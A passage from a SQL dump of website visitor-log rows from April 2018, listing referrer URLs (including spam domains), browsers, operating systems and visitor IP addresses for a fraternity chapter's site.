WZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041dmtFYlpwRlVQSnFCNGtGMGR0VzVRc2Z4azNxMDVfOXN3djA2eUpDVjcxQSws&sign=4c1513d2e4e40fc364fc5a9c0818ed5e&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','159.89.141.132','000',2,0),(29009,'2018-04-17','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.183.165.74','000',2,0),(29010,'2018-04-17','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1760.J7-oIgrQTqIR84y2sntcoVfRiTseV3iushZPaN5VG9I.7c08caf026ef00666c06a5bab646dbc9f382d890&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041SnZNRG5zMXY1SWNQNzZQdC10TU00Z2NLWkVUS0w5bkV5SVZBek9LSDBYZyws&sign=41059efa7d3db90e5cbeded816c00a24&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','159.89.193.3','000',2,0),(29011,'2018-04-17','https://zphiblgz.org','curl','Unknown','7.47.0','','176.56.224.115','000',2,0),(29012,'2018-04-17','http://magnetic-bracelets.ru/','MSIE','Windows','6.0','','178.137.81.28','000',2,0),(29013,'2018-04-17','https://www.google.com/','Safari','iPhone','11.0','','96.231.149.73','000',2,0),(29014,'2018-04-17','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1760.eBQypFfGiJ5iR0zgHdLh1UW9SGknEvnzUC-BYxfmluk.0bf633e023f76d4a971c1a76a9d79f8a36fe9cc5&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043ZElLRDVIYnhUeE1lVjRtczY2M09vQXBqc3U2UVFvY0N0Y1RobVlIdXJ2dyws&sign=134e8ea18c8d255f2e177c2b5113708d&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','165.227.239.126','000',2,0),(29015,'2018-04-17','https://zphiblgz.org','Chrome','Macintosh','62.0.3202.89','','104.131.19.168','000',3,0),(29016,'2018-04-17','https://zphiblgz.org','Chrome','Macintosh','11.0.696.68','','208.80.194.32','000',1,0),(29017,'2018-04-17','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1760.wHby709TEEe0KJW5kB9-rmugev2EgfjY6LGhx16t6vA.ed83d83f22a03db8398f4dabc6b89fecd8ebbdf1&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042QmJncTRULTFYMlpRUHVpanF4clFIWDVSUlNaeGx4MDVZVGFGVElrdlRLZyws&sign=47aa35988b8afda462fc8c75955c0253&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','159.89.12.212','000',2,0),(29018,'2018-04-17','https://zphiblgz.org','Apache-HttpClient','Unknown','UNAVAILABLE','','174.225.143.240','000',2,0),(29019,'2018-04-17','https://zphiblgz.org','Firefox','Windows','4.0.1','','208.80.194.31','000',1,0),(29020,'2018-04-17','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.31','000',1,0),(29021,'2018-04-17','https://zphiblgz.org','python-requests','Unknown','2.18.4','','109.201.142.35','000',1,0),(29022,'2018-04-17','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.30','000',1,0),(29023,'2018-04-17','https://buy-meds24.com/cialis-fr.html','MSIE','Windows','6.0','','178.137.164.67','000',4,0),(29024,'2018-04-17','https://zphiblgz.org','Chrome','Linux','26.0.1410.63','','185.81.157.179','000',5,0),(29025,'2018-04-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','185.81.157.179','000',6,0),(29026,'2018-04-17','https://picturesmania.com/','MSIE','Windows','6.0','','46.119.121.74','000',1,0),(29027,'2018-04-17','https://www.google.com/','Chrome','Windows','65.0.3325.181','','207.151.35.13','000',1,0),(29028,'2018-04-17','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.30','000',1,0),(29029,'2018-04-17','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.32','000',1,0),(29030,'2018-04-17','https://zphiblgz.org','Chrome','Windows','12.0.742.91','','208.80.194.32','000',1,0),(29031,'2018-04-17','https://www.google.com/','Safari','iPhone','11.0','','99.203.16.249','000',2,0),(29032,'2018-04-17','https://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',2,0),(29033,'2018-04-17','http://zphiblgz.org/','MSIE','Windows','11.0','','82.102.20.230','000',1,0),(29034,'2018-04-17','https://beachtoday.ru/','MSIE','Windows','6.0','','5.248.253.101','000',3,0),(29035,'2018-04-17','https://zphiblgz.org','Safari','iPhone','11.0','','99.203.143.85','000',3,0),(29036,'2018-04-17','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',4,0),(29037,'2018-04-17','https://www.google.com/','Chrome','Windows','65.0.3325.181','','214.36.71.194','000',2,0),(29038,'2018-04-17','https://zphiblgz.org','Firefox','Windows','40.1','','182.191.224.131','000',2,0),(29039,'2018-04-17','https://zphiblgz.org','Firefox','Windows','40.1','','95.70.175.85','000',2,0),(29040,'2018-04-17','https://www.bing.com/','MSIE','Windows','11.0','','152.130.15.14','000',2,0),(29041,'2018-04-17','https://distonija.com/','MSIE','Unknown','6.0','','178.137.164.67','000',3,0),(29042,'2018-04-17','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.31','000',1,0),(29043,'2018-04-17','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.31','000',1,0),(29044,'2018-04-17','https://zphiblgz.org','Firefox','Macintosh','3.6.11','','208.80.194.35','000',1,0),(29045,'2018-04-17','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.35','000',1,0),(29046,'2018-04-17','https://zphiblgz.org','Chrome','Windows','11.0.696.68','','208.80.194.35','000',1,0),(29047,'2018-04-17','https://zphiblgz.org','Firefox','Windows','7.0.1','','77.247.181.163','000',1,0),(29048,'2018-04-17','https://zphiblgz.org','Chrome','Windows','12.0.742.91','','208.80.194.27','000',1,0),(29049,'2018-04-17','https://www.google.com/','Chrome','Windows','65.0.3325.181','','73.173.254.31','000',4,0),(29050,'2018-04-17','https://zphiblgz.org','Chrome','Macintosh','62.0.3202.94','','52.165.148.51','000',1,0),(29051,'2018-04-17','https://www.google.com/','Chrome','Windows','65.0.3325.181','','4.14.104.198','000',2,0),(29052,'2018-04-18','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','165.227.237.58','000',2,0),(29053,'2018-04-18','http://zphiblgz.org/','Chrome','Linux','63.0.3239.132','','223.72.60.174','000',2,0),(29054,'2018-04-18','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1760.EWHGGFDvBpxEiOKyYrKSuXfmq5Slt7LCBzve2sJ1gx4.8f9d1c377d01bd09e122e4202444df52bf6fa173&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042djhBVEQ3eDFfZFA5U3dkQ1otUDY3a2pHdjFJNHJ5TFdqZzBlUndtWVpvdyws&sign=625c53ff29a289cc20ad11a329cb9853&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','178.79.147.224','000',2,0),(29055,'2018-04-18','https://zphiblgz.org','Chrome','Macintosh','11.0.696.68','','208.80.194.29','000',1,0),(29056,'2018-04-18','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.29','000',4,0),(29057,'2018-04-18','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1760.PgL0wbVoNV-i_ksICjuH7f8Mqm_yV0I6WRMXsjXonv4.c61e3a5a34e2f5e1cb2d4ff20df6d2a6a095785d&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043TFdrbTRLdXNaVktFeGNodGdETGNIY1RiQmV6OXdnbzByYjByU3hyTWs2USws&sign=d259f7e180bcf312a36d113c643e988b&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','192.241.248.209','000',2,0),(29058,'2018-04-18','https://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.21','000',1,0),(29059,'2018-04-18','http://healgastro.com/','MSIE','Windows','6.0','','178.137.81.28','000',4,0),(29060,'2018-04-18','https://zphiblgz.org/','Chrome','Macintosh','63.0.3239.132','','149.202.50.209','000',2,0),(29061,'2018-04-18','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.32','000',1,0),(29062,'2018-04-18','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','199.66.201.19','000',8,0),(29063,'2018-04-18','https://zphiblgz.org','Firefox','Windows','40.1','','41.142.227.239','000',2,0),(29064,'2018-04-18','https://zphiblgz.org','Chrome','Windows','41.0.2228.0','','195.201.90.245','000',4,0),(29065,'2018-04-18','https://zphiblgz.org','Chrome','Windows','23.0.1271.6','','95.152.62.202','000',2,0),(29066,'2018-04-18','https://zphiblgz.org','CATExplorador','Unknown','1.0beta','','45.32.144.70','000',3,0),(29067,'2018-04-18','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.31','000',1,0),(29068,'2018-04-18','https://www.bing.com/','MSIE','Windows','11.0','','152.180.7.254','000',2,0),(29069,'2018-04-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','150.95.157.226','000',2,0),(29070,'2018-04-18','https://distonija.com/','Opera','Windows','8.01','','5.248.253.101','000',3,0),(29071,'2018-04-18','https://www.xn--80aaajkrncdlqdh6ane8t.xn--p1ai/','MSIE','Windows','5.5','','178.137.81.28','000',3,0),(29072,'2018-04-18','http://www.zphibmaryland.org/chapters/','Chrome','Windows','66.0.3359.117','','71.43.118.60','000',3,0),(29073,'2018-04-18','https://zphiblgz.org','Firefox','Windows','7.0.1','','197.231.221.211','000',2,0),(29074,'2018-04-18','http://zphiblgz.org/','Firefox','Windows','7.0.1','','188.209.49.20','000',1,0),(29075,'2018-04-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','167.114.158.57','000',12,0),(29076,'2018-04-18','https://zphiblgz.org','Chrome','Android','45.0.2454.94','','167.114.158.57','000',1,0),(29077,'2018-04-18','https://zphiblgz.org/','Chrome','Windows','63.0.3239.84','','31.130.4.240','000',2,0),(29078,'2018-04-18','https://jobius.com.ua/','MSIE','Windows','6.0','','178.159.37.55','000',9,0),(29079,'2018-04-18','https://zphiblgz.org','Firefox','Linux','3.6.13','','208.80.194.29','000',1,0),(29080,'2018-04-18','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.29','000',1,0),(29081,'2018-04-18','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',4,0),(29082,'2018-04-18','https://zphiblgz.org','Firefox','Windows','7.0.1','','208.80.194.30','000',1,0),(29083,'2018-04-18','https://zphiblgz.org','Chrome','Windows','65.0.3325.181','','208.76.113.3','000',3,0),(29084,'2018-04-18','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.28','000',1,0),(29085,'2018-04-18','https://google.com/\\\\\\\'','Unknown','Unknown','Unknown','','193.93.192.99','000',2,0),(29086,'2018-04-18','https://zphiblgz.org','Safari','Macintosh','11.0.1','','66.181.208.60','000',1,0),(29087,'2018-04-18','https://www.google.com/','Safari','iPhone','11.0','','99.203.16.107','000',2,0),(29088,'2018-04-18','https://zphiblgz.org','Python','Unknown','3.5','','35.184.204.178','000',2,0),(29089,'2018-04-18','https://zphiblgz.org','MSIE','Windows','11.0','','161.69.99.11','000',2,0),(29090,'2018-04-18','https://zphiblgz.org','Firefox','Windows','38.0','','23.94.185.210','000',2,0),(29091,'2018-04-18','https://infodocsportal.com/','MSIE','Windows','6.0','','178.137.165.1','000',3,0),(29092,'2018-04-18','https://zphiblgz.org','Chrome','Macintosh','11.0.696.68','','208.80.194.27','000',1,0),(29093,'2018-04-18','https://zphiblgz.org','Chrome','Linux','5.0.375.53','','208.80.194.27','000',1,0),(29094,'2018-04-18','https://documentbase.net/','Opera','Windows','8.01','','178.137.165.1','000',2,0),(29095,'2018-04-18','https://zphiblgz.org','Chrome','Macintosh','51.0.2704.84','','199.19.224.189','000',2,0),(29096,'2018-04-18','https://www.google.com/','Chrome','Windows','65.0.3325.181','','184.4.8.52','000',9,0),(29097,'2018-04-18','https://www.google.com/','Safari','iPhone','11.0','','99.203.16.68','000',2,0),(29098,'2018-04-18','https://zphiblgz.org','MSIE','Windows','6.0','','34.209.182.200','000',3,0),(29099,'2018-04-18','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.32','000',1,0),(29100,'2018-04-18','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.29','000',1,0),(29101,'2018-04-19','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.30','000',1,0),(29102,'2018-04-19','https://zphiblgz.org','Chrome','Linux','5.0.375.53','','208.80.194.32','000',2,0),(29103,'2018-04-19','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','83.136.249.195','000',2,0),(29104,'2018-04-19','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1761.jz2f_WbU4uCTUIXI1V66HRLFZGRo9ZDtDV7jqwa92PU.cfbc5a9a778cd58bdcb504c6f966761ec6721788&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042Q0w2czdLMU85eVhzVXdJaHBvc2JMSUVqaUF2Zi1BSmdkM2kxbnp6NjR5QSws&sign=dbd2949432fa2659d6b9effc9b41d052&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','45.76.128.22','000',2,0),(29105,'2018-04-19','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1761.cFGvu1ynGHDjHu4vrclwPt0sw7ic3uEXvXmU8qfSSZ8.3b8bf0682b307a3bd16b5e7c53a8acaf002ce8cf&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040Y0JvZlVhcHNMaVJMZl9mdUVPcmliUURKRFM0TEQyRjdNajFJSUM0TWFtZyws&sign=eeee72bf415b3af62da00af92ea77dc4&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','165.227.196.185','000',2,0),(29106,'2018-04-19','https://picturesmania.com/','Opera','Windows','8.01','','46.119.121.74','000',4,0),(29107,'2018-04-19','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.29','000',1,0),(29108,'2018-04-19','https://zphiblgz.org','Firefox','Windows','4.0.1','','208.80.194.29','000',1,0),(29109,'2018-04-19','https://zphiblgz.org','Firefox','Windows','40.1','','183.83.48.63','000',2,0),(29110,'2018-04-19','http://zahvat.ru/','Opera','Windows','9.00','','178.137.81.28','000',3,0),(29111,'2018-04-19','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1762.Q2EgaiwYC7GyAIxwLJH3uFoue4m6nWOHFKemWIX6DMo.00e4ccaba411188122bacbae4d9066f07e3b564f&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043VXVxdGNKQlRmMUJ6QzBuTGFBMDNFUDVWU1RPTHpXeHIwYi1jUkNxN2V6dyws&sign=1f8ce05d9d7e201eb4c531c3b1784812&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','138.68.141.22','000',2,0),(29112,'2018-04-19','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1762.aA8eN0DV6b7RpGKqixs1xBSRqh_qU4p3XJ7PrhXIWzQ.6502203b75eb0c070cb218f8c57fd6277c1a4b5b&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043bmZfbzE1UDdzQWdmX2xTZ1gyWFNMSERVV0ZlNWEySjR6bkxOSkFENm9wdyws&sign=7a5ce03ad7f3f97577e1de1bfbc3fc8b&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','164.132.182.237','000',2,0),(29113,'2018-04-19','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1762.pdFSxo06VGU0aHw2dZA89-y1Kw8ngDmP5wVW1Sb9knE.a0a198d124f258d077ec22cdb874ed37fdcd20dc&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042TTItZ3pQeHJQS3hJVDgyWnpZNmxmX3FMUkxTT1dVLTdtWmt1LUFVSm51USws&sign=f8f233d4a3820f7729ab5df131e588a3&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','192.241.176.194','000',2,0),(29114,'2018-04-19','https://beremenyashka.com/','MSIE','Windows','6.0','','178.137.164.67','000',10,0),(29115,'2018-04-19','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','69.4.92.158','000',4,0),(29116,'2018-04-19','https://zphiblgz.org','AppleWebKit','Windows','534','','131.253.25.233','000',1,0),(29117,'2018-04-19','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','199.66.201.19','000',2,0),(29118,'2018-04-19','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.29','000',2,0),(29119,'2018-04-19','https://zphiblgz.org','Firefox','Windows','3.6.18','','208.80.194.29','000',1,0),(29120,'2018-04-19','https://zphiblgz.org','MSIE','Windows','9.0','','34.209.175.187','000',3,0),(29121,'2018-04-19','https://zphiblgz.org/','Firefox','Windows','37.1','','31.130.4.240','000',2,0),(29122,'2018-04-19','https://allergick.com/','Opera','Windows','7.60','','178.137.165.1','000',3,0),(29123,'2018-04-19','http://www.zphiblgz.org','Chrome','Linux','65.0.3325.181','','159.203.69.239','000',18,0),(29124,'2018-04-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','159.203.69.239','000',1,0),(29125,'2018-04-19','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.32','000',1,0),(29126,'2018-04-19','https://zphiblgz.org','Firefox','Windows','40.1','','39.47.247.124','000',2,0),(29127,'2018-04-19','https://zphiblgz.org/','Firefox','Windows','43.0','','77.120.125.23','000',2,0),(29128,'2018-04-19','https://zphiblgz.org','Firefox','Windows','40.1','','93.39.185.77','000',2,0),(29129,'2018-04-19','https://zphiblgz.org','Python-urllib','Unknown','2.6','','5.62.62.177','000',1,0),(29130,'2018-04-19','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',4,0),(29131,'2018-04-19','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.67.59.131','000',2,0),(29132,'2018-04-19','https://zphiblgz.org','Firefox','Linux','3.6.11','','208.80.194.30','000',1,0),(29133,'2018-04-19','https://zphiblgz.org','Firefox','Windows','3.6.13','','208.80.194.30','000',1,0),(29134,'2018-04-19','https://zphiblgz.org','Firefox','Windows','40.1','','92.58.231.31','000',2,0),(29135,'2018-04-19','https://zphiblgz.org','Firefox','Windows','7.0.1','','164.132.51.91','000',1,0),(29136,'2018-04-19','https://zphiblgz.org','Firefox','Windows','40.1','','77.147.130.40','000',2,0),(29137,'2018-04-19','https://zphiblgz.org','ZoomInformation','Unknown','Unknown','','35.229.93.15','000',1,0),(29138,'2018-04-19','https://zphiblgz.org','Java','Unknown','1.7.0','','35.229.93.15','000',1,0),(29139,'2018-04-19','http://www.zphibmaryland.org/chapters/','Chrome','Android','65.0.3325.109','','100.16.216.127','000',3,0),(29140,'2018-04-19','http://l.facebook.com/l.php?u=http%3A%2F%2Fzphiblgz.org%2F&h=ATP9Dd0j1Ero3dh-8x88n6S6_mSn18IuBPzc8Lcv9N5VX63v82dVfGpbrODGK96MkGst_-wvGHJR49PJWpA4meCHeMt0dBsy6yZCGyZl0vBQZ93NebPjJjg3PYO37g','Chrome','Windows','65.0.3325.181','','173.252.92.118','000',1,0),(29141,'2018-04-19','http://l.facebook.com/l.php?u=http%3A%2F%2Fzphiblgz.org%2F&h=ATP9Dd0j1Ero3dh-8x88n6S6_mSn18IuBPzc8Lcv9N5VX63v82dVfGpbrODGK96MkGst_-wvGHJR49PJWpA4meCHeMt0dBsy6yZCGyZl0vBQZ93NebPjJjg3PYO37g','Chrome','Windows','65.0.3325.181','','173.252.92.115','000',1,0),(29142,'2018-04-19','https://zphiblgz.org/','Chrome','Windows','65.0.3325.181','','173.252.92.116','000',1,0),(29143,'2018-04-19','https://zphiblgz.org/','Chrome','Windows','61.0.3163.100','','31.130.3.181','000',2,0),(29144,'2018-04-19','https://zphiblgz.org/','Chrome','Windows','63.0.3239.84','','149.202.50.209','000',1,0),(29145,'2018-04-19','http://www.zphibmaryland.org/chapters/','Safari','iPhone','11.0','','71.114.37.90','000',6,0),(29146,'2018-04-19','https://hoztorg-opt.ru/','MSIE','Windows','6.0','','178.137.81.28','000',3,0),(29147,'2018-04-19','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.32','000',1,0),(29148,'2018-04-19','https://owa.howardcc.edu/owa/','Chrome','Macintosh','65.0.3325.181','','69.138.93.246','000',2,0),(29149,'2018-04-19','https://zphiblgz.org','AppleWebKit','Windows','534','','131.253.25.239','000',1,0),(29150,'2018-04-19','https://zphiblgz.org','Safari','iPhone','11.0','','73.200.96.24','000',2,0),(29151,'2018-04-20','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.32','000',1,0),(29152,'2018-04-20','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.32','000',1,0),(29153,'2018-04-20','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','164.132.211.151','000',2,0),(29154,'2018-04-20','https://zphiblgz.org','AppleWebKit','Windows','534','','131.253.27.98','000',1,0),(29155,'2018-04-20','https://zphiblgz.org','Firefox','Linux','3.6.13','','208.80.194.32','000',1,0),(29156,'2018-04-20','https://google.com/\\\\\\\'','Unknown','Unknown','Unknown','','185.250.43.170','000',2,0),(29157,'2018-04-20','https://zphiblgz.org','Opera Next','Windows','50.0.2762.58','','148.251.54.44','000',1,0),(29158,'2018-04-20','https://zphiblgz.org','Chrome','Macintosh','63.0.3239.132','','136.243.17.161','000',1,0),(29159,'2018-04-20','https://zphiblgz.org','Firefox','Windows','40.1','','73.128.160.107','000',2,0),(29160,'2018-04-20','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1763.t8y5AVZG_KH8nyEH3sMSoXcLSh-gixUEnOaPX_6Laj4.540c553ae95c8c7f1bdf31f37f8d695d54e4b5b7&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041MkNHaG1UZVB4NF9wcnJzV1BreHRwZ0NJdWtaXzVzVWpIZWU1ZENpYVlBUSws&sign=98e658a449199e1f0d780881d429b137&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','138.197.134.132','000',2,0),(29161,'2018-04-20','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1763.qL9lfPbz6PaYoUF6ydma6M72HIOdY1P3Ty2ELLXgy84.6bd8e3a8c88c76d95fd7d18ba733c204e1cfe8ff&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042QXN0cWFvT3NkNC1oMmlqTE9pbXhIU2s5Y0JwS3JsX1RyV3diSUw4akdSdyws&sign=a9aac6eca156607efbc217d4654eb475&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','192.241.221.134','000',2,0),(29162,'2018-04-20','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1763.ngQL3b_U9uTJQv7iH32nIRkOlEAu_afHy5O-b_EhqOA.bdb7d4f7af10bd0fa87a387c910c2ccf335b193a&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041SkpmSEtWMXFVTWNoTFpOSC1GS2FsRGxHQ1NDeXR4SnA1N3hickswc3VyQSws&sign=b1b4759cc134d0b48175325b3fe4d214&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','178.79.132.46','000',2,0),(29163,'2018-04-20','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1763.OAI68q6hhS_arAjI_qwbAKk6xWn2VzNdCWZ50MYqTz0.6f2924e933528581955382739f20be79811e1824&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040Q0ZOMFNMZUhEYW9MYUpVLU5RdXFpNWJZTVF3YXNuTjBobWFDNGZKOFd3dyws&sign=00af7ac56dce3b9d51b4597f7fec8069&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','47.52.192.177','000',2,0),(29164,'2018-04-20','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1763.ia8x9m-GcigZ2WW4FRFywl09Sprd92ZBkDzOg2IDJb0.5a445f92793ad2adf898bd831ca13ef45a2d33c9&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041MjhLVERhMkdOa1Z0STFvaUUyWjd6dXhPdzJtS1RhQ3JuaUxTd1R6RWg4dyws&sign=d2c28fed72602423177e78193c1990a0&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','139.59.122.69','000',2,0),(29165,'2018-04-20','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1763.MMDmEhX5T_cIF1WVZxPvWFRxSC46l_pYJ2Kim-eYQ-M.7ddd6b8efa153418be4a7fd8ac002a890fc828cc&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041U3NrUHBZMXBwaHRramthZW44OUR4ZmR1ZGNhR3gzUmliX1hnVWU4aXhBUSws&sign=cb7105ef7fe8183e4f5a2574e62c8d76&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','188.166.104.157','000',2,0),(29166,'2018-04-20','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3